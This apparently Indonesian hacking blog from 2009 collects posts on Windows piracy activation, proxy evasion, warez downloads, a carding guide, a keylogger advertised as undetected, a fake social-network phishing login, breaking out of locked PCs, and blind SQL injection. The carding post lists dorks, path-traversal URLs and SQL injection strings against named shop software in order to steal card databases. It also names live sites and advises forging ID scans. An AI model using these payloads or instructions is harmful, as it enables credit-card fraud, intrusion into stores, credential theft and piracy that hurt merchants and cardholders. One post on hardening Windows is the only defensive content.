Rabu, Agustus 05, 2009
Minggu, Juli 26, 2009
Membuat windows menjadi asli di mata microsoft
Oleh : Zee
Bagi para pengguna windows XP Pro bajakan dan ga bs make update2an baru dari pihak microsoft, ga’ usa berkecil hati.
Kami punya solusi buat ngerubah windows bajakan anda jadi windows asli (Genuine) di mata microsoft.
So anda bs update windows anda sepuasna dari microsoft tanpa takut windows anda di matiin ma pihak microsoft.
:D Aman kalo di sweeping juga loh. :D
Sebelum Kujelasin tutorialnya, donlot dulu file pendukungna di
http://oasisnet.wordpress.com/download/
Pastikan anda menggunakan account administrator sebelum mulai menilep Windows bajakan anda!!
STEP I
Jalanin keyFinder.exe(Beberapa antivirus mungkinakan mendetekna sebagai spyWare). Akan terlihat seperti gambar berikut :
STEP II
Trus pilih change windows key.
STEP III
Ganti deh keyna. Pke windows xp key.txt yg uda dibundel dalam paket. Trus lik OK. Akan ada pemberitahuan bila berhasil
STEP IV –> Finish
cek keaslian windows anda sekarang. Buka folder “Tool dari Microsoft Buat Cek Windows asli ato palsu”, jalanin “Microsoft Genuine Advantage Diagnostic Tool.exe”. Tunggu bentar. kalo berhasil akan terlihat seperti gambar 4:
Validation Status windows anda sekarang “Genuine” Kalo gagal (Status Invalid/BLK) Coba Lagi.
Sekarang Windows anda sudah 100% original!! Untuk mencobanya coba download Produk microsoft yg baru “IE7” [DownLoad] dan aktifkan update otomatis windows anda. Dijamin tanpa masalah!
Sabtu, Juli 25, 2009
Menembus proxy server dengan IP Desimal (cm5)
Oleh : CyberMuttaqin
Ini adalah trik yang ke 5 dari saya masih dengan tema yang sama untuk menerobos block situs dari ISP maupun warnet, atau kantor anda...
namun dengan trick yang beda...
ini POCnya...
1. Buka cmd
Start >> All Programs >> Accesories >> Command Prompt
2. ketik ping site yang terblock untuk kita lihat ip addressnya...
disini saya mencontohkan http://www.youtube.com
karena ada beberapa isp yang memblog situs ini...
Code: Select all
ping www.youtube.com
maka kita dapat melihat ip addressnya yaitu :
kita mendapatkan ip addressnya yaitu :
Code: Select all
208.177.236.70
3. masukkan alamat ini ke
Code: Select all
http://www.allredroster.com/iptodec.htm
untuk kita jadikan desimal :
kita lihat hasilnya ...
Code: Select all
Desimal dari alamat ip 208.177.236.70 adalah HTTP://3497389126
4. Setelah ketemu pindahkan HTTP://3497389126 ke browser kesayangan anda!
dan hasilnya :
bang...
tu situs udah nongol...
Kamis, April 30, 2009
Yahoo messenger10 Final(NEW)
Download Ym 10 Final:
http://www.ziddu.com/download/4534350/Yahoo_messenger10_Final_free-warez.net.rar.html
password:
free-warez.net
Senin, April 27, 2009
Carding
Oleh : v3n0m
carding, old bugs but works
Carding…carding…carding, sebener’a males banget buat bikin tutorial ini, tapi yach terpaksa gw bikin tutorial ini karena gw udah capek di tanyain gimana sey cara carding? bro ajarin carding dunkz ?! om cara dapetin cc valid tuch gimana ?? dan bahkan ada yg tanpa malu² langsung ngomong, nyet !! pesen laptop or aircraft dunk satu, kirim ke alamat gw yak, gileee benerrrr klo ngomong seenak jidat !! dan yg bikin gw paling bete klo mereka nanyaaAaaaAaaa molo yg semua jawaban’a tuch udah jelas² ada di google, padahal google lebih mengerti daripada gw
Ngomong sey emang gampang, tapi praktek’a itu butuh kesabaran, harus pinter ngomong, fasih berbahasa inggris dan untuk lo tau bahwa carding itu untung²an, jadi ngapain juga klo gw dapet barang bagus gw kasih ke lo, mendingan buat gw aja
pasti lo² semua yg sering nanya ke gw mo tau kan apa aja yg gw persiapkan sebelom melakukan carding, well… tanpa ada sedikitpun yg gw tutup²in terkecuali bagian bawah dari tubuh gw, sekarang gw kasih tau:
1. Credit Card number + cvv + expired (harus valid)
2. Proxy USA klo bisa
3. Virtual Phone Number (skype)
4. Virtual Address (klo di butuhkan)
5. Email khusus carding (yahoomail,gmail,hotmail,etc)
6. Seller
7. Dropper (biar barang lo cepet nyampe’a)
8. Roko Mild satu bungkus
9. Snack Potato Rasa Barbeque 5 Bungkus
10. Music Player (winamp,jet audio,amarok)
okay !! gw yakin lo pada nanya gimana cara dapetin proxy? nah di sini balik lagi dey lo sama yg nama’a webshell yg lo dapetin dari web yg mempunyai bug Remote File Inclusion, di sana lo bisa bikin proxy sendiri, tapi klo lo emang orang’a “MALES” mendingan lo balik lagi ke paman google, lo bisa cari situs² penyedia proxy gratis, tapi yaa gitu dey, ga awet, paling lama juga 1 jam udah mati.
Kedua tentang virtual phone number, tau skype kan ? itu loch yg buat voip (voice over internet protocol) nah lo bisa beli nomer telephone virtual dari USA melewati skype, trus fungsi’a buat apa ?? gw males jelasin’a mendingan lo join aja di chan #yogyacarderlink dan tanya² sama anak² yg ada di sana okay !!
Ketiga tentang virtual address, di sini lo beli alamat virtual di USA dan ada lembaga di sana yg ngurus barang² lo buat di kirim ke alamat asli lo, cuma proses pembelian’a agak susah, lo harus nunjukin credit card, license drive, ID card, visa, paspor, bingung gimana cara’a ? buat apa ada photoshop klo ga di gunain, hahahah, lagian dia kan cuma minta gambar hasil scan, jadi cari aja gambar²a di google trus edit dey di photoshop.
Keempat Email khusus, satu hal penting, jangan pernah ngirim orderan ke email lo yg biasa lo pake buat ngirim² pesan penting, jangan pernah lo campur aduk tu email, klo bisa lo bikin lagi email baru yg khusus buat carding, dan biasain pake logika lo, klo mo carding, nama email’a yg berhubungan dengan nama² orang USA sana, minimal lo dapet 1 point kecil penting lah untuk nama email ini.
Kelima lo harus punya seller or penjual yg kira² bisa shipping worldwide, silakan cari sendiri shop online di google yg bisa shipping worldwide dengan imajinasi kata² lo sendiri.
Keenam about Dropper, nah ini di butuhin klo emang kita dapet shop online yg ga nerima shipping worldwide, inti’a lo harus punya kenalan or koneksi di USA atau di Canada bahkan mungkin England yg bisa di ajak kerjasama, jadi begitu barang di kirim ke dropper, dia langsung ngirim ke alamat kita, jadi seandai’a lo beli laptop, jangan beli satu, tapi minimal dua, biar satu buat kita, satu buat dia, itu nama’a kerjasama kan ?? dan di situlah kerjaan dropper, mereka cuma ngedrop barang kita doank dan mereka dapet untung juga dari kita
and The Last, how to find valid credit card, here’s old bug but works
1. contoh bugs pada bentuk toko sistem shopadmin :
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
Ketik google.com :–> allinurl:/shopadmin.asp
Contoh target : www.xxxxxx.com/shopadmin.asp
Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
user : ‘or’1
pass : ‘or’1
2. contoh bugs pada bentuk toko sistem : Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/store/index.cgi/page=
Contoh target : www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm
Hapus short_blue.htm dan ganti dengan –> ../admin/files/order.log
Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/
order.log
3. contoh bugs pada bentuk toko sistem : metacart
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com allinurl:/metacart/
Contoh target : www.xxxxxx.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan –> /database/metacart.mdb
Hasilnya : /www.xxxxxx.com/metacart/database/metacart.mdb
4. contoh bugs pada bentuk toko sistem :D CShop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/DCShop/
Contoh : www.xxxxxx.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan –> /DCShop/orders/orders.txt
atau /DCShop/Orders/orders.txt
Hasilnya : www.xxxx.com/xxxx/DCShop/orders/orders.txt
5. contoh bugs pada bentuk toko sistem : PDshopro
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/shop/category.asp/catid=
Contoh : www.xxxxx.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan –> /admin/
dbsetup.asp
Hasilnya : www.xxxxxx.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama
sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi
www.xxxxxx.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database
access.mdb sebaiknya pake ms access aja)
6. contoh bugs pada bentuk toko sistem : commerceSQL
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google : Ketik –> allinurl:/commercesql/
Contoh : www.xxxxx.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan –>
cgi-bin/commercesql/index.cgi?page=
Hasilnya : www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config –>
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
Untuk melihat admin manager –>
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
Untuk melihat file log/CCnya –>
www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order…
7. contoh bugs pada bentuk toko sistem : EShop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google: Ketik –> allinurl:/eshop/
Contoh : www.xxxxx.com/xxxxx/eshop
Hapus /eshop dan ganti dengan –> /cg-bin/eshop/database/order.mdb
Hasilnya : www.xxxxxx.com/…/cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces
(karena untuk membaca database access.mdb sebaiknya pake ms access
aja)
8. contoh bugs pada bentuk toko sistem : Cart32 v3.5a
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com: Ketik –> allinurl:/cart32.exe/
Contoh : www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan –> error
Bila kita mendapati page error dg keterangan instalasi dibawahnya,
berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman
kebawah, dan cari bagian Page Setup and Directory
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32
berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program
text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah
dimodifikasi tadi, dengan format
http://www.xxxxx.com/cart32/
Contoh http://www.xxxxxxx.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32
9. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
teknik/jalan ke dua
google.com Ketik –> allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian
shopdisplayproducts.asp
Contoh :
http://xxxxxxx.com/vpasp/shopdisplayproducts.asp?cat=qwerty’%20union%…,
fldpassword%20from%20tbluser%20where%20fldusername=
‘admin’%20and%20fldpassword%20like%20'a%25'–
Gantilah nilai dari string url terakhir dg:
%20'a%25'–
%20'b%25'–
%20'c%25'–
Kalau berhasil, kita akan mendapatkan informasi username dan password
admin
Untuk login admin ke http://xxxx.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya
10. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/vpasp/shopsearch.asp
Buka url target dan utk membuat admin baru, postingkan data berikut
satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1' where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6
Untuk login admin, ada di http://xxxxxxx/vpasp/shopadmin.asp
11. contoh bugs pada bentuk toko sistem : Lobby.asp
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com Ketik –> allinurl: Lobby.asp
Contoh : www.xxxxx.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan –> fpdb/shop.mdb
Hasilnya : www.xxxxx.com/fpdb/shop.mdb
12. contoh bugs pada bentuk toko sistem : Shopper.cgi
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google : Ketik –> allinurl: /cgi-local/shopper.cgi
Contoh : www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&key=
Tambah dengan –> …&template=order.log
Hasilnya : www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&key=…&template…
13. contoh bugs pada bentuk toko sistem :P roddetail.asp
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
Ketik –> allinurl:proddetail.asp?prod=
Contoh : www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan –> fpdb/
vsproducts.mdb
Hasilnya : www.xxxxxx.org/fpdb/vsproducts.mdb
14. contoh bugs pada bentuk toko sistem :D igishop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google Ketik –> inurl:”/cart.php?m=”
Contoh : http://xxxxxxx.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan –>admin
Hasilnya http://xxxxxx.com/store/admin
Trus masukin username sama pass nya pake statment SQL injection
Usename : ‘or”=”
Password : ‘or”=”
well, menurut gw ini udah cukup menjelaskan bagaimana langkah² untuk melakukan carding, dan klo masih ada yg mo di tanyain lagi, silakan join aja di #yogycarderlink@Dal.net, cuz i dont wanna you ask to me on private messege again about carding !!
#yogyacarderlink@Dal.net cRew
Digital Keylogger V3.3, Reverse
Nama: Digital Keylogger
Versi: 3.3
Pengarang: Nytro
Rilis: 1 Februarie 2009
Powered by: Tim Keamanan Rumania
Website: http://www.rstcenter.com
Sama seperti Digital Keylogger v3.2 dengan beberapa bug fixex, dan pretyy UD. NOD32, update, tidak menemukannya. Dan saya pikir Norton, Avira (jika tidak dikemas dengan UPX), AVG dan Kaspersky juga.
Server ukuran:
- Kemasan: 36,0 KB
- Diekstrak: 112 KB
Screenshot:
Option:
- Tersembunyi dari Task Manager
- Tutup Windows Firewall
- Dapatkan keylog automaticaly
- Gey keylog manual
- Reverse sambungan
- Tutup Y! Messenger untuk mencuri password
- Bla bla ...
Fake Login fs
Oleh : indra910
seperti judulnya kita udah bisa tebak kegiatan apa yang akan kita lakukan. yaitu FAKE LOGIN (halaman login palsu FS).
langsung aja.. terlebih dahulu kita harus mempunyai hostingan yang suport dgn PHP. (ripway, fileave)
1. buat file kosong d hostingan kamu, beri nama password.txt. yang nantinya file ini adalah sebagai tempat penampungan password account korban.
2. copas script di bawah :
:
Download link dibawah ini, kemudian ikuti perintah'nya:
http://www.ziddu.com/download/4483514/Fake_login.txt.html
Wireless Hack Tools 2009
Oleh : --.acaboncu.--
• NetStumbler 0.4.0
• Kismet 2005 08 R
• Wellenreiter v1.9
• WEP Crack 0.1.0
• Airsnort 0.2.7e
• Wepwedgie 0.1.0 alpha
• Hotspotter 0.4
Information File:
Name: AIO Wireless Hack Tools 2009 Full
Size: 8,1 MB (recovery register 1%)
Language: English
Support Platform: Linux, Windows.
Format: RAR
Download :
http://www.ziddu.com/download/4483451/AIO_WHT2009_-_ErFeX__AiO.ProgramasFull.CoM.rar.html
Pasword = http://aio.programasfull.com/
masuk DOS windows xp yg dikunci total
Oleh : odysei
ne sdkit cara yg tgnnya pada gatel kagak bisa nyentuh fasilitas DOS atw ap pun yg d kunci pada suatu warnet..
ne caraya:
:
1. Pada icon dalam dekstop atau start menu di klik kanan, lalu pilih properties
2. Di properties pilihlah "find targetr30;"
3. Muncul Window lalu pilih search diatas
4. Pada Search pilihlah "All Files and folders"
5. Lalu cari file "cmd.exe" di windows
6. Jika di temukan maka jalankan file cmd.exe.
7. Dengan menjalankan file cmd.exe maka anda telah masuk ke dos Jika ternyata penguncian benar-benar total maka anda dapat mengubah registry windows melalui pembuatan file *.reg dengan notepad / word pad, kemudian anda jalankan file *.reg tersebut.
ne isi dari file *.reg
:
REGEDIT4 [HKEY_CURRENT_USER\""SOFTWARE\""Microsoft\""Windows \""CurrentVersion\""Policies\""System] "DisableRegistryTools"=dword:00000001 [HKEY_CURRENT_USER\""SOFTWARE\""Microsoft\""Windows \""CurrentVersion\""Policies\""Explorer] "NoRun"=dword:00000000
silahkan dicoba ya..
akibat di tnggung pengguna..
hahahahahaha.....
Penangkalan dari serbuan hacker
Oleh : odysei
ne cara penangkalan terhadap serbuan para hacker...
silahkan dibaca...
:
1. Memblokir Remote Access => Utk mencegah PC anda diambil alih oleh Hacker,nonaktifkan Remote Access. Dlm menu Start, klik kanan pada “My Computer” & pilih “Properties”. Maka ada tampilan “System Properties”, kemudian pilih tab “Remote”, singkirkan/hilangkan tanda ( V ) yg ada didepan semua option yg ada utk menonaktifkannya. Kemudian klik “OK”.
2. Menghapus User Account yg tdk terpakai => Pada “Windows XP Professional” terdapat beberapa user account yg dapat diakses melalui trojan & dimanfaatkan utk melakukan penyerangan. Utk menyingkirkannya pilih menu Start, pilih “Control Panel”, pilih “Performance and Maintenance”. Kemudian pilih “Administrative Tools”, Klik 2 kali “Computer Management”. Pilih “Local Users and Groups”, pada sisi kanan klik 2 kali pd bagian “Users”. Hapuslah account2 lama yg tdk anda gunakan ( gambar users yg ada tanda X ). Kemudian tutuplah tampilan2 tadi.
3. Menutup celah NetBIOS => File2 dokumen anda bisa diakses melalui Internet maka nonaktifkanlah NetBIOS. Dlm menu Start, klik kanan pada “My Network Place” & pilih “Properties”. Maka ada tampilan “Network Connections”. Kemudian klik kanan icon koneksi internet yg tersedia, pilih “Properties”. Jika ada tampilan, pilih tab “Networking”. Beri tanda ( V ) yg ada didepan “Internet Protocol (TCP/IP), kemudian klik tab “Properties” yg ada dibawahnya. Maka ada tampilan “Internet Protocol (TCP/IP) Properties”, pilih tab “Advanced”. Tampilan ada lagi “Advaced TCP/IP Settings”, pilih tab “Wins”, lalu pilih “Disable NetBIOS over TCP/IP. Klik ‘OK”.
4. Penanggulangan terhadap BO2K pada Windows 9x => BO2K dapat dilacak dgn scanning port. Biasanya pd Windows 9x yg terbuka portnya hanya satu yaitu port 139 (NetBios). Oleh karena itu perlu dicurigai jika kita mengetahui ada port lain selain port 139 yg terbuka. Program anti virus yg beredar saat ini dapat mendeteksi keberadaan program ini. Pastikan anda sudah melakukan download versi terbaru dari program anti virus. Rajin2 lah membuka registrasi Windows. Biasanya pd Windows 9x, karena BO2K menanamkan dirinya pada
“HKEY_LOCAL_MACHINESoftwareMicrosoftWindows
CurrentVersionRunServices”
atau pada
“HKEY_LOCAL_MACHINESoftwareMicrosoftWindows
CurrentVersionRun”.
5. Pengamanan BIOS pada Server => BIOS merupakan perangkat lunak aras rendah yg berguna utk melakukan konfigurasi atau manipulasi hardware pada PC berbasis x86. MS Windows maupun Lilo dari Linux menggunakannya utk menentukan prosedur melakukan booting pada PC anda. Anda perlu memproteksi BIOS anda dgn memberi password padanya. Cara ini juga berguna utk mencegah penggunaan booting up melalui floppy disk. Cara ini tdk memberi perlindungan secara maksimal pada PC anda, namun dapat mempersulit org lain utk mengacak2 PC anda. Perlu diingat bahwa BIOS saat ini menggunakan metode flashroom, yg memungkinkan kita utk mengubah konfigurasi atau bahkan menghapusnya sama sekali.
6. Penyalahgunaan CGI Shell pada Unix/Linux => Ada beberapa cara yg cukup ampuh utk menanggulanginya :
a. Anda pasang Chrooted-Jail pada Apache anda sehingga perintah yg dapat dijalankan dapat anda batasi.
b. Utak-atik Source Code dari fasilitas CGI yg akan anda berikan misalnya Perl, kemudian anda matikan fasilitas fungsi system ( )… [Smile]
c. Minimalisasi terjadinya eksploit local pada sistem anda dgn sering mengutak-atik & mengikuti perkembangan berita seputar sekuriti.
7. Menghapus komponen COM yg tdk dibutuhkan pd Windows 2000/XP => Beberapa komponen COM yg tdk dibutuhkan oleh hamper semua aplikasi harus dihapus. Pertimbangkan dulu sebelum menghapusnya karena setiap komponen saling berhubungan dgn file system & dictionary object. Dalam menu Start pilih Internet Explorer, pada menu”Tools” pilih “Internet Options”. Jika ada tampilan, pilih tab “Connections”. Didalam “Dial-up and Virtual Private Network Setting” hapus COM yg tdk dibutuhkan dgn mengkliknya lalu pilih “Remove”. Kemudian klik “OK’.
8. Mengaktifkan Firewall => Agar Hacker & penyerang tidak sampai ke PC anda, dibutuhkan sebuah Firewall. Dengan Firewall, anda dapat memblokir beberapa port yg kerap diserang Hacker. Kami sarankan anda memakai McAfee Personal Firewall Plus 2004, McAfee Internet Security Suite 6.0 & ZoneAlarm.
9. Menginstalasi Anti Virus => Software antivirus tidak hanya menyingkirkan virus, worm, atau file perusak lainnya tetapi juga melindungi PC dari ancaman serangan Script di website. Kami sarankan anda memakai program antivirus McAfee VirusScan Professional 8.0, McAfee SpamKiller 5.0 & McAfee Worm Removal Plus.
10. Jangan anda melakukan chatting di MIRC sebelum tips diatas dipraktekkan, kalo tidak PC anda akan diseramg oleh Hacker karna IP anda bisa diliat melalui MIRC.
Meningkatkan bandwith FF
heyyy.....
ketemu lagi ma w....
ok deh,kita langsung aja ya...
Buka Browser Mozilla Firefox…
Pada Address Bar Ketik : ABOUT:CONFIG
Cari string di bawah ini : ( pastikan semua srting dibawah "TRUE")
contoh menggantingnya :
NETWORK.HTTP.PIPELINING FALSE ==> klik kanan dan pilih "Toggle"
NETWORK.HTTP.PIPELINING TRUE
NETWORK.HTTP.PIPELINING.MAXREQUESTS 64
NETWORK.HTTP.PROXY.PIPELINING TRUE
NETWORK.PROXY.SHARE_PROXY_SETTINGS FALSE <=== ini harus False buat srting baru caranya : Klik Kiri 1X Dimana Saja, Klik Kanan NEW>>INTEGER
Ketik : NGLAYOUT.INITIALPAINT.DELAY Beri Nilai 0
Kemudian REFRESH atau Tekan F5
Pada Address Bar Ketik : ABOUT:BLANK
. Klik Menu:
Untuk OS Windows XP TOOLS>>OPTIONS>>WEB FEATURES
Untuk OS Linux ( Vector ) EDIT >> PREFERENCES
Untuk Setting yang berbeda di beberapa OS EDIT >>ADVANCED
Pada Option :
ALLOW WEB SITES TO INSTALL SOFTWARE Beri Tanda Check Box Untuk mengaktifkan
Kemudian Tekan OK Lalu REFRESH ( F5 )
Masuk Ke Link Ini :
https://addons.mozilla.org/extensions/moreinfo.php?applicati onfiltered=firefox&id=125
atau :
https://addons.mozilla.org/extensions/moreinfo.php?id=125&am p;applicationfiltered=firefox
Download Software SwitchProxy Tool Versi 1.3.4
Setelah Selesai Jangan Tekan Tombol UPDATE
Klik Tanda X (tutup)Yang Ada Di Pojok Kanan Atas Dari POP UP Window Yang Muncul
Tutup Semua Browser Mozilla FireFox,
Kemudian Buka Lagi Untuk Mengaktifkan Software SwitchProxy Tool Versi 1.3.4 Yang sudah di Install Tadi
Kalo Instalasi Sukses, Akan Muncul Toolbar tambahan Di Bawah Toolbar Navigasi & Address Bar.
Sekarang Browser Mozilla Siap Untuk Digunakan…….
:: NOTE ::
Software SwitchProxy Tool Versi 1.3.4 Ini selain untuk Mengganti Proxy Secara Otomatis Di Browser Mozilla FireFox, Engine-nya Juga Berpengaruh terhadap Kecepatan Koneksi Internet
Perubahan Yang Signifikan Terjadi Pada koneksi Internet Dengan BROADBAND / VSAT.
Dapetin password lewat google
Oleh : odysei
yang dibutuhken adalah:
jelas kompie yang terkonek internet ,account gmail ,referensi situs (yang akan di pishing)
ok deh caranya
masuk ke Gmail Account kemudian ikuti langkah berikut ne...
:
1. langsung aja www.google.com/alerts
kalau ditanyain sama mbah google isi aja account google kamu
2. keluar deh”Create a Google Alert”, trus “Search
Masukin aj yg yg di bawah ini or terserah sepengetahuan kamu tentang alamat www.xxx
terms”http://www.tickleworld.com/members/index.html
trus “Type” choose “News and Web”. pilih apa aja coba semua
“How Often” pilih aja
3. tinggal tunggu deh
4. yang sabar namanya juga mancing
5. tinggalin ajah sehari atau lebih jangan cuma 1 detik
6. klo uda Buka Gmail km..cek inbox nya
hajar dah..
Carding wiTh COMERSUS
Oleh : ebeL
Code:
INURL://comersus//database//
cari sedikit site2 tertentu yg lw pilih berbau shop gtuh lah
Ini w kasih site shop yg masih bagus utk di intip cc nya tiap minggu... Cool
Code:
http://www.oascctv.co.uk/database/comersus.mdb
http://site309.mysite4now.com/mitackle/ ... oducts.asp
Nah cara kita mengambil database dari shop itu dgn comersus.mdb yakni:
Code:
http://site309.mysite4now.com/mitackle/comersus/store/comersus_listCategoriesAndProducts.asp
nah klu udah kita ganti dgn
Code:
http://site309.mysite4now.com/mitackle/comersus/comersus.mdb
kelar deh Surprised
Nah sekarang coba kita test cc tersebut di mirc,ets.... tapi tertentu room nya
Nah klu ente blm puas silakan tanyakan dgn pakarnya langsung
Jumat, Februari 06, 2009
..::deepblind sql ::..
~ oLeh : tUcKer ~
Aku akan mencoba menjelaskan sesimple mungkin tentang blind sql injection yang aku anggap dulu rumit banget... Bukannya sok ngajarin atau apalah, disini aku hanya berusaha memberikan apa yang aku punya dan bisa...
Oke, semua bermula karena aku suntuk banget...Semua target .go.id, co.id atau apapun.id dah dibabat habis sama senior disini...Akhirnya tanpa sengaja aku nyangkut ke situs luar...Anggep aja situs tersebut bernama
http://iseng.com/news.php?id=76009
Nah pada target aku kali ini, aku menggunakan sql commands mid() yang hampir sama fungsinya dengan substring()...
Langsung aja aku ketik
http://iseng.com/news.php?id=76009 and 1=0
dan ternyata hasilnya adalah FALSE
http://iseng.com/news.php?id=76009 and 1=1
bernilai TRUE
Nah setelah aku yakin kalo web tersebut vulnerable maka aku melakukan injeksi (hehehehe...)
http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(65)
Nah penjelasannya supaya lo semua pada ngerti (hehehehe...orang aku juga baru belajar, sok ngasih tau...) aku akan coba menjelaskan arti dan makna dari baris URL dan statement diatas...
~ mid(user()1,1) artinya dalam kasus ini aku tidak mengetahui value atau nilai dari user itu apa, maka dalam "()" aku sengaja kosongkan.
~ 1,1 adalah urutan dari value tersebut.
~ CHAR adalah peubah dalam desimal
~ 65 adalah value decimal tersebut dan 65 adalah "A" dalam ASCII so aku akan mengawalinya dengan 65
Nah kalo dah begini apa yang akan terjadi? Dalam tampilan web tersebut akan terjadi true atau false...Nah dalam kasus ini false, berarti aku harus memasukkan nilai yang lain agar menjadi true...
FALSE
http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(65)
FALSE
http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(66)
TRUE!!!
http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(67)
Akhirnya mendapatkan nilai true dan nilai tersebut adalah 67 (C dalam ASCII)
Cari nilai kedua dan caranya adalah...
http://iseng.com/news.php?id=76009 and mid(user(),1,2)=CHAR(67,65)
Nah 1,1 nya dah diganti dengan 1,2...Jadi kalo dah dapet diganti aja jadi 1,3...1,4 dan seterusnya...
Nah akhirnya aku mendapat nilai true pada angka ke 82 (R dalam ASCII)
Lanjutin aja sampe dapet nilai atau value user dan sampai akhirnya menjadi
http://iseng.com/news.php?id=76009 and mid(user(),1,6)=CHAR(67,82,85,90,51,78)
67=C
82=R
85=U
90=Z
51=3
78=N
Ternyata username-nya adalah CRUZ3N (Wow.... Kebetulan yang sangat lucu ;p)
Nah untuk cari passwordnya aku tinggal mengganti value user() menjadi database() dan lakukan semua tahap diatas dari pertama sampe dapet value true...
Contoh:
http://iseng.com/news.php?id=76009 and mid mid(database(),1,5)=CHAR(75,69,82,69,78)
Jadi password yang didapat adalah...
75=K
69=E
82=R
69=E
78=N
Jadi username dan passwordnya adalah CRUZ3N dan KEREN...
Ternyata Blind SQL Injection gak nyebel-nyebelin amat (Tapi ngebetein...). Nah katanya neh...cara ini cukup efektif untuk web yang telah menfilter SQL Injection...Bener gak tuh? Gak tau dah... Ilmu aku belom nyampe situ...
Oke sampe disini aja yah...
Mohon maaf jika ada salah-salah kata dan berhubung aku lupa jadi kagak ada screenshootnya (Padahal kalo ada keren banget tuh ;p).
Semoga penjelasan yang sangat amat singkat dan gak ada apa-apanya ini dapat berguna...
Nih kode ASCII yang sapa tau berguna...
Char Code Description
9 Tab
10 Line feed
13 Carriage return
' ' 32 Space
! 33 Exclamation mark
" 34 Quotation mark
# 35 Number sign
$ 36 Dollar sign
% 37 Percent sign
& 38 Ampersand
' 39 Apostrophe
( 40 Left parenthesis
) 41 Right parenthesis
* 42 Asterisk
+ 43 Plus sign
, 44 Comma
- 45 Hyphen-minus
. 46 Full stop
/ 47 Solidus
0 48 Digit zero
1 49 Digit one
2 50 Digit two
3 51 Digit three
4 52 Digit four
5 53 Digit five
6 54 Digit six
7 55 Digit seven
8 56 Digit eight
9 57 Digit nine
: 58 Colon
; 59 Semicolon
< 60 Less-than sign
= 61 Equals sign
> 62 Greater-than sign
? 63 Question mark
@ 64 Commercial at
A 65 Latin capital letter A
B 66 Latin capital letter B
C 67 Latin capital letter C
D 68 Latin capital letter D
E 69 Latin capital letter E
F 70 Latin capital letter F
G 71 Latin capital letter G
H 72 Latin capital letter H
I 73 Latin capital letter I
J 74 Latin capital letter J
K 75 Latin capital letter K
L 76 Latin capital letter L
M 77 Latin capital letter M
N 78 Latin capital letter N
O 79 Latin capital letter O
P 80 Latin capital letter P
Q 81 Latin capital letter Q
R 82 Latin capital letter R
S 83 Latin capital letter S
T 84 Latin capital letter T
U 85 Latin capital letter U
V 86 Latin capital letter V
W 87 Latin capital letter W
X 88 Latin capital letter X
Y 89 Latin capital letter Y
Z 90 Latin capital letter Z
[ 91 Left square bracket
92 Reverse solidus
